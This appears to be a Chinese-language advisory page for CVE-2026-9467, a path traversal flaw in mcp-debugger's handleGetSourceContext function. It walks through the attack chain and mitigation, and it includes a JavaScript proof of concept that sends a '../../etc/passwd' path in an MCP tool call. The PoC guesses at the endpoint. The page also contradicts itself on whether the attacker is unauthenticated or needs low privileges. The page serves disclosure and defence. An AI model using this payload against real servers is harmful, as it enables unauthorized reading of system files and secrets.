CVE-2026-9467 CVSS 4.3 中危

CVE-2026-9467 debugmcp mcp-debugger路径遍历漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9467

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

debugmcp mcp-debugger

漏洞概述

debugmcp mcp-debugger 0.20.0及之前版本被发现存在路径遍历漏洞。该问题源于文件src/server.ts中的handleGetSourceContext函数未能正确处理用户提供的路径参数。未经身份验证的远程攻击者可利用此漏洞，通过构造包含“../”序列的恶意请求读取服务器上的任意文件。目前该漏洞利用代码已公开，且厂商尚未做出响应，存在较高的信息泄露风险。

技术细节

该漏洞根因在于debugmcp mcp-debugger组件在处理源码上下文获取请求时，未对输入参数进行有效的路径清理。具体而言，`src/server.ts`文件中的`handleGetSourceContext`函数直接使用用户输入拼接文件路径，未进行标准化处理或基于白名单的校验。攻击者可利用路径遍历序列（如`../`或绝对路径）突破预期目录限制，访问服务器文件系统中的任意文件。由于CVSS评分为4.3，属于中危漏洞，攻击者需具备低权限（PR:L）且通过网络发起攻击（AV:N）。虽然对系统完整性（I:N）和可用性（A:N）无直接影响，但机密性（C:L）受损可能导致敏感配置、密钥或源代码泄露，进而危及整体系统安全。鉴于厂商未响应，用户需格外警惕该风险。

攻击链分析

STEP 1

侦察

攻击者识别网络上运行debugmcp mcp-debugger服务的目标。

STEP 2

构建载荷

攻击者构造包含路径遍历字符（如../）的恶意请求参数，旨在访问受限制目录之外的文件（如/etc/passwd）。

STEP 3

发送请求

攻击者通过网络向目标服务器的handleGetSourceContext接口发送包含恶意路径的请求。

STEP 4

数据泄露

服务器由于未正确校验路径，读取并返回了攻击者指定的敏感文件内容，造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-9467 in debugmcp mcp-debugger
// The vulnerability exists in the 'handleGetSourceContext' function
// allowing attackers to read arbitrary files via path traversal.

async function exploit(targetUrl) {
    // Malicious payload to traverse to the root directory and read /etc/passwd
    const maliciousPath = "../../etc/passwd";

    // Construct the request payload based on the MCP protocol or API endpoint
    const payload = {
        jsonrpc: "2.0",
        method: "tools/call", // Assuming this triggers the handler
        params: {
            name: "get_source_context",
            arguments: {
                path: maliciousPath
            }
        },
        id: 1
    };

    try {
        const response = await fetch(targetUrl, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify(payload)
        });
        const data = await response.json();
        console.log("Exploit result:", data);
    } catch (error) {
        console.error("Exploit failed:", error);
    }
}

// Usage: exploit("http://localhost:3000/mcp");

影响范围

debugmcp mcp-debugger <= 0.20.0

防御指南

临时缓解措施

建议在`handleGetSourceContext`函数中添加严格的输入校验，过滤`../`、`..\`等特殊字符，并使用`path.resolve`或类似机制将文件访问限制在特定根目录内。若无法立即修复代码，请暂时关闭该服务或通过网络ACL（访问控制列表）限制外部对该服务的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9467
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9467
3 Details https://www.cvedetails.com/cve/CVE-2026-9467/
4 VulDB https://vuldb.com/cve/CVE-2026-9467
5 Link https://github.com/hyk6225/public_exp/issues/1
6 Link https://vuldb.com/submit/813980
7 Link https://vuldb.com/vuln/365448
8 Link https://vuldb.com/vuln/365448/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表